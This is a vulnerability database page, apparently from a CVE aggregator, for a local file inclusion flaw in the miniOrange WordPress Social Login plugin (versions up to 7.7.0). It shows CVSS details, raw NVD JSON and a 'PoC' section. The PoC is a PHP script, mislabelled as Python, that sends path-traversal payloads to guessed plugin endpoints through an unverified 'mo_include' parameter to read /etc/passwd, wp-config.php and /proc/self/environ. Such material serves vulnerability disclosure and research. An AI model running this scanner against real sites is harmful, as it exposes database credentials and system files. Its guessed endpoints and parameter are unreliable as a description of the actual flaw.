Security Vulnerability Report
中文
CVE-2025-68974 CVSS 6.6 MEDIUM

CVE-2025-68974

Published: 2025-12-30 11:15:56
Last Modified: 2026-04-27 19:16:38

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in miniOrange WordPress Social Login and Register miniorange-login-openid allows PHP Local File Inclusion.This issue affects WordPress Social Login and Register: from n/a through <= 7.7.0.

CVSS Details

CVSS Score
6.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

miniorange-login-openid <= 7.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-68974 PoC - miniOrange WordPress Social Login LFI * Author: Security Research Team * Description: Local File Inclusion exploit for miniorange-login-openid plugin <= 7.7.0 */ // Target configuration $target = "http://target-site.com"; $wp_path = "/wp-content/plugins/miniorange-login-openid/"; // Vulnerable endpoint paths (common patterns) $vulnerable_paths = [ $wp_path . "includes/lib/class-mo-login-wsfid.php", $wp_path . "classes/class-mo-login-utility.php", $wp_path . "mo_openid_sso_settings.php" ]; // LFI payload examples $lfi_payloads = [ "../../../../../../etc/passwd", "../../../../../../wp-config.php", "../../../../../../proc/self/environ" ]; echo "[*] CVE-2025-68974 LFI PoC\n"; echo "[*] Target: $target\n\n"; foreach ($vulnerable_paths as $path) { foreach ($lfi_payloads as $payload) { $url = $target . $path . "?mo_include=$payload"; echo "[*] Testing: $url\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($http_code == 200 && strlen($response) > 100) { echo "[!] Potential LFI found with payload: $payload\n"; echo "[+] Response preview: " . substr($response, 0, 200) . "\n\n"; } } } echo "[*] Scan complete.\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68974", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:15:55.893", "lastModified": "2026-04-27T19:16:38.300", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in miniOrange WordPress Social Login and Register miniorange-login-openid allows PHP Local File Inclusion.This issue affects WordPress Social Login and Register: from n/a through <= 7.7.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.7, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/miniorange-login-openid/vulnerability/wordpress-wordpress-social-login-and-register-plugin-7-7-0-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}